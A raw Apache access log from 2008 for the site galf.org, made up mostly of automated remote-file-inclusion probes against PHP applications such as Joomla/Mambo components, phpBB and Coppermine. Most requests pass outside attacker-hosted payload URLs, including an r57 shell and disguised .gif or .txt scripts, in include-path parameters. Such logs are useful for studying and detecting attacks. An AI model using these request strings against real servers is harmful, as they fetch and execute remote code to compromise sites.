80.249.117.99 - - [30/Mar/2008:17:20:08 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://w0rms.by.ru/safe.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
80.249.117.99 - - [30/Mar/2008:17:20:09 -0700] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://w0rms.by.ru/safe.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
189.19.255.240 - - [30/Mar/2008:17:20:28 -0700] "GET /logs/access_070730.log/index.php?x=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.173.76 - - [30/Mar/2008:17:20:34 -0700] "GET /logs/access_070716.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.173.76 - - [30/Mar/2008:17:20:35 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.173.76 - - [30/Mar/2008:17:20:35 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.15.133.133 - - [30/Mar/2008:17:22:11 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://66.194.79.1/~holeshot/form/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
204.15.133.133 - - [30/Mar/2008:17:22:11 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://66.194.79.1/~holeshot/form/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.galf.org"
204.15.133.133 - - [30/Mar/2008:17:22:20 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://66.194.79.1/~holeshot/form/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "galf.org"
204.15.133.133 - - [30/Mar/2008:17:22:20 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://66.194.79.1/~holeshot/form/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "galf.org"
140.113.4.81 - - [30/Mar/2008:17:22:29 -0700] "GET /logs/access_070716.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
140.113.4.81 - - [30/Mar/2008:17:22:29 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
140.113.4.81 - - [30/Mar/2008:17:22:30 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
89.111.173.76 - - [30/Mar/2008:17:22:59 -0700] "GET /logs/access_070820.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
61.63.3.45 - - [30/Mar/2008:17:23:11 -0700] "GET /logs/access_070917.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.63.3.45 - - [30/Mar/2008:17:23:12 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.63.3.45 - - [30/Mar/2008:17:23:13 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.205.57.211 - - [30/Mar/2008:17:23:29 -0700] "GET //module/forum/forum.php?website=http://hoypinoy.com/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.galf.org"
74.205.57.211 - - [30/Mar/2008:17:23:29 -0700] "GET /logs//module/forum/forum.php?website=http://hoypinoy.com/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
61.63.3.45 - - [30/Mar/2008:17:23:44 -0700] "GET /logs/access_071014.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.63.3.45 - - [30/Mar/2008:17:24:37 -0700] "GET /logs/access_071014.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
140.113.4.81 - - [30/Mar/2008:17:25:19 -0700] "GET /logs/access_070820.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
221.143.48.95 - - [30/Mar/2008:17:28:24 -0700] "GET /logs//?phpbb_root_path=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 200 6949 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
74.205.57.211 - - [30/Mar/2008:17:28:59 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://hoypinoy.com/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
74.205.57.211 - - [30/Mar/2008:17:28:59 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://hoypinoy.com/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.galf.org"
209.163.169.99 - - [30/Mar/2008:17:31:13 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/emptygold/images/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
221.143.48.95 - - [30/Mar/2008:17:31:37 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
221.143.48.95 - - [30/Mar/2008:17:31:37 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
89.89.224.76 - - [30/Mar/2008:17:31:38 -0700] "GET /logs/access_080324.log HTTP/1.0" 200 10612928 "-" "Wget/1.10.2" "galf.org"
212.116.174.9 - - [30/Mar/2008:17:33:35 -0700] "GET /logs/access_080218.log//Neos_Chronos/header.php?base_folder=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
220.135.204.131 - - [30/Mar/2008:17:34:33 -0700] "GET /logs/access_070917.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
220.135.204.131 - - [30/Mar/2008:17:34:34 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
220.135.204.131 - - [30/Mar/2008:17:34:35 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
220.135.204.131 - - [30/Mar/2008:17:35:42 -0700] "GET /logs/access_070917.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
220.135.204.131 - - [30/Mar/2008:17:35:42 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
220.135.204.131 - - [30/Mar/2008:17:35:43 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
220.135.204.131 - - [30/Mar/2008:17:36:28 -0700] "GET /logs/access_071014.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
88.24.155.195 - - [30/Mar/2008:17:37:56 -0700] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.onlineprofitexpert.com/mail/attach/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.52.2.130 - - [30/Mar/2008:17:39:58 -0700] "GET /logs/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
88.24.155.195 - - [30/Mar/2008:17:41:44 -0700] "GET /logs/access_071014.log//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.onlineprofitexpert.com/mail/attach/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.24.155.195 - - [30/Mar/2008:17:41:45 -0700] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.onlineprofitexpert.com/mail/attach/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.24.155.195 - - [30/Mar/2008:17:41:45 -0700] "GET /logs//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.onlineprofitexpert.com/mail/attach/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.118.102.153 - - [30/Mar/2008:17:45:17 -0700] "GET /logs/index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
207.188.72.170 - - [30/Mar/2008:17:47:10 -0700] "GET /logs/access_071231.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.vsm.gov.tr/pwnd/safe.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
67.15.78.65 - - [30/Mar/2008:17:47:33 -0700] "GET /logs/appserv/main.php?appserv_root=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
67.15.78.65 - - [30/Mar/2008:17:47:35 -0700] "GET /appserv/main.php?appserv_root=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
213.156.192.5 - - [30/Mar/2008:17:47:38 -0700] "GET /logs//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.156.192.5 - - [30/Mar/2008:17:47:38 -0700] "GET //saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
207.188.72.170 - - [30/Mar/2008:17:47:46 -0700] "GET /logs/access_080114.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.vsm.gov.tr/pwnd/safe.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
221.143.48.95 - - [30/Mar/2008:17:51:13 -0700] "GET /logs//header.php?abspath=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
221.143.48.95 - - [30/Mar/2008:17:51:14 -0700] "GET //header.php?abspath=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
212.116.174.9 - - [30/Mar/2008:17:53:07 -0700] "GET /logs/access_071015.log//newspublish/include.php?path%5Bdocroot%5D=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
212.116.174.9 - - [30/Mar/2008:17:53:11 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
212.116.174.9 - - [30/Mar/2008:17:53:14 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
67.15.78.65 - - [30/Mar/2008:17:54:06 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
67.15.78.65 - - [30/Mar/2008:17:54:13 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
213.156.192.5 - - [30/Mar/2008:17:55:13 -0700] "GET /logs//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.156.192.5 - - [30/Mar/2008:17:55:14 -0700] "GET //saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
221.143.48.95 - - [30/Mar/2008:17:56:31 -0700] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
221.143.48.95 - - [30/Mar/2008:17:56:33 -0700] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
209.216.209.45 - - [30/Mar/2008:17:56:53 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.visionnoir.com/newsreport/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.galf.org"
209.216.209.45 - - [30/Mar/2008:17:56:53 -0700] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.visionnoir.com/newsreport/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.galf.org"
62.193.226.196 - - [30/Mar/2008:17:57:18 -0700] "GET /logs/access_071022.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.156.192.5 - - [30/Mar/2008:17:58:35 -0700] "GET /logs/access_071022.log//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.19.33.141 - - [30/Mar/2008:17:59:48 -0700] "GET /logs/access_071231.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=www.cypris.de/images/stories/frut/uploads/micid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.63.3.45 - - [30/Mar/2008:18:00:25 -0700] "GET /logs//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.63.3.45 - - [30/Mar/2008:18:00:26 -0700] "GET //saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.19.33.141 - - [30/Mar/2008:18:00:58 -0700] "GET /logs/access_080114.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=www.cypris.de/images/stories/frut/uploads/micid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.52.2.130 - - [30/Mar/2008:18:01:23 -0700] "GET /logs/access_070827.log/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.163.141.54 - - [30/Mar/2008:18:01:26 -0700] "GET //admin_db_utilities.php?phpbb_root_path=http://www.col.fr/img/xpll.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "galf.org"
213.156.192.5 - - [30/Mar/2008:18:01:57 -0700] "GET /logs/access_080113.log/modify.php?dir_module=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.156.192.5 - - [30/Mar/2008:18:01:57 -0700] "GET /modify.php?dir_module=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.156.192.5 - - [30/Mar/2008:18:01:58 -0700] "GET /logs/modify.php?dir_module=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.156.192.5 - - [30/Mar/2008:18:02:11 -0700] "GET /logs/access_071014.log//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.163.169.99 - - [30/Mar/2008:18:02:30 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/emptygold/images/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.19.52 - - [30/Mar/2008:18:03:31 -0700] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
213.156.192.5 - - [30/Mar/2008:18:03:49 -0700] "GET /logs/access_071022.log//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.52.2.130 - - [30/Mar/2008:18:04:32 -0700] "GET /logs/access_071203.log/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.2.130 - - [30/Mar/2008:18:06:23 -0700] "GET /logs/index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.2.130 - - [30/Mar/2008:18:06:23 -0700] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.80.134 - - [30/Mar/2008:18:06:48 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://sinbinxxx.com/test/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
209.62.80.134 - - [30/Mar/2008:18:06:48 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://sinbinxxx.com/test/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
213.156.192.5 - - [30/Mar/2008:18:07:05 -0700] "GET /logs/access_071014.log//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
88.131.106.16 - - [30/Mar/2008:18:07:06 -0700] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [30/Mar/2008:18:07:07 -0700] "GET /tmp/?N=A HTTP/1.0" 200 504 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [30/Mar/2008:18:07:09 -0700] "GET /tmp/?S=A HTTP/1.0" 200 504 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [30/Mar/2008:18:07:10 -0700] "GET /tmp/?S=D HTTP/1.0" 200 504 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
205.234.213.67 - - [30/Mar/2008:18:07:50 -0700] "GET //?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.808" "www.galf.org"
67.195.44.110 - - [30/Mar/2008:18:12:09 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.44.108 - - [30/Mar/2008:18:12:10 -0700] "GET /logs/access_080113.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
61.63.3.45 - - [30/Mar/2008:18:13:39 -0700] "GET /logs//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.63.3.45 - - [30/Mar/2008:18:13:40 -0700] "GET //saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.63.3.45 - - [30/Mar/2008:18:15:28 -0700] "GET /logs/access_080113.log/modify.php?dir_module=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.63.3.45 - - [30/Mar/2008:18:15:29 -0700] "GET /modify.php?dir_module=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.63.3.45 - - [30/Mar/2008:18:15:30 -0700] "GET /logs/modify.php?dir_module=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.15.78.65 - - [30/Mar/2008:18:15:31 -0700] "GET /includes/settings.inc.php?include_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
67.15.78.65 - - [30/Mar/2008:18:15:31 -0700] "GET /logs/includes/settings.inc.php?include_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
189.19.255.240 - - [30/Mar/2008:18:16:12 -0700] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
189.19.255.240 - - [30/Mar/2008:18:16:12 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
189.19.255.240 - - [30/Mar/2008:18:16:18 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.18.207.65 - - [30/Mar/2008:18:17:14 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.18.207.65 - - [30/Mar/2008:18:17:14 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.213.67 - - [30/Mar/2008:18:17:59 -0700] "GET /logs/access_071231.log//?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.213.67 - - [30/Mar/2008:18:17:59 -0700] "GET /logs//?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 200 6949 "-" "libwww-perl/5.808" "www.galf.org"
205.234.213.67 - - [30/Mar/2008:18:18:07 -0700] "GET /logs/access_070806.log//?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.116.174.9 - - [30/Mar/2008:18:18:15 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
212.116.174.9 - - [30/Mar/2008:18:18:19 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
212.116.174.9 - - [30/Mar/2008:18:18:22 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
221.143.48.95 - - [30/Mar/2008:18:19:47 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
